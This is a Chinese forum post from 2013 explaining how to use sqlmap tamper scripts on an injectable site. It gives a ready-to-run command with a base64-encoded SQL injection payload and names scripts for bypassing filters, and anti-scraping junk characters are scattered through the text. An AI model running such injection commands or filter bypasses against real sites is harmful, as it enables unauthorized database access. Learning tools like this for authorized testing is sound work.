WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?& e9 V: g* E1 k# `2 t
: \; i& {2 N( m- Zsqlmap的tamper里有个base64encode.py; H8 h5 M d0 _* v4 @9 J
; W. P0 K; j: ]- J+ d- x) p7 g/ }/ n使用如下! T3 N, M# h, s M4 G
, N3 ?1 j) t6 \* nsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
3 U; S ], N+ T2 Z; k
: A8 j/ C: s- I$ ?) I* B
. q- e1 U4 n! {; asqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”+ N6 R E" q7 e' W4 F
- j e- k3 e& m( q其中常用到的bypass脚本绕过SQLMAP主要两个脚本:* f* H7 K2 d9 `4 r0 i% E
; i4 h6 F3 u% m+ T
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入( M; {+ d, ]. Z/ l1 c
space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入: Q& Q4 W8 h& |$ ^! ]. C
首先确定目标数据库版本,然后选择相应的脚本。
6 C" w. l3 U' o6 ^2 B-v 3 --batch --tamper "space2hash.py"+ w; O+ u% L) X8 b7 u
9 F* i8 k3 A, @& t! ]1 l7 ?还有其他一些插件:
' p" y" s# {9 }: V0 L8 d3 |, D4 nencodes编码 ——charencode.py% o3 u7 v! D/ h/ b' V
base64编码 —— base64encode.py
5 `6 s5 A6 U' k5 u+ C" `# c替换空格和关键字 —— halfversionedmorekeywords.py5 h2 ^4 M- d0 m3 u% y
|
7 I$ C u+ k# p) P7 J1 }
! j+ @& Q0 M, s6 H
+ a7 ^6 B8 I7 u4 Q, W/ G* Z9 [- X
6 E' K+ }6 v6 H; u U |
发表于 2013-11-23 15:50:45
收藏
支持
反对